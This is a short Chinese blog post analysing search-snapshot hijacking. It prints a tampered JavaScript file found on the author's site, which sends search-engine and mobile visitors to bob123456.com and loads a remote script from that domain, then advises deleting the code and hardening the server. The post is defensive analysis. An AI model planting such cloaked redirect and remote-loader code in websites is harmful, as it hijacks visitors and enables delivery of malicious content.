zoukankan      html  css  js  c++  java
  • 快照劫持的原理与JS跳转的分析

    近日,查看网站快照时,发现从百度快照页点击过去后,都跳转到了一个体裁站,但是直接访问,没有任何跳转,打开页面发现有一个js文件被篡改了。代码如下:

     1 <script type="text/javascript">
     2 var je1 = /(sogou|soso|baidu|google|youdao|yahoo|bing|sm|so|biso|gougou|ifeng|ivc|sooule|niuhu|biso|360)/g;
     3 var gtABvrdzG2 = /(Sogousearch|sogousearch|SogouSearch|baiduboxapp|SogouMobileBrowser|iPhone OS)/g;
     4 var $P3 = window["document"]['referrer'];
     5 if (je1['test']($P3) || gtABvrdzG2['test'](navigator['userAgent'])) {
     6     if ((navigator['userAgent']['match'](/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) {
     7         setTimeout("tiaoZ('https://bob123456.com/m/')", 1 * 200)
     8     } else {
     9         window["document"]['write']('<script src="https://www.bob123456.com/bob.js"></script></div>') } } function tiaoZ(nDZp4) { window['location']['href'] = nDZp4 };
    10 </script>

    此段代码显示,如果链接来源于第二行中字符串任何一个匹配,则跳转到 https://bob123456.com/。

    因此,发生以上的现象,只需要找到该代码删除即可解决跳转。

    不过,因为此段代码,是被渗透后,修改了的结果,最终的解决办法是要加强服务器的反渗透及安全防御,可以使用安全狗、360等安全软件进行环境监控及防御。

  • 相关阅读:
    ORA-01207: file is more recent than control file
    ORA-08189
    oracle 修改表空间存储路径
    oracle 日志文件管理
    Oracle ClusterwarePRCT-1011 : Failed to run "oifcfg".&nb
    linux:文件打包与压缩
    linux:查找搜索文件
    Python:lambda表达式(匿名函数)
    网络协议各层概述
    linux:用户及文件权限管理
  • 原文地址:https://www.cnblogs.com/chig/p/14956123.html
Copyright © 2011-2022 走看看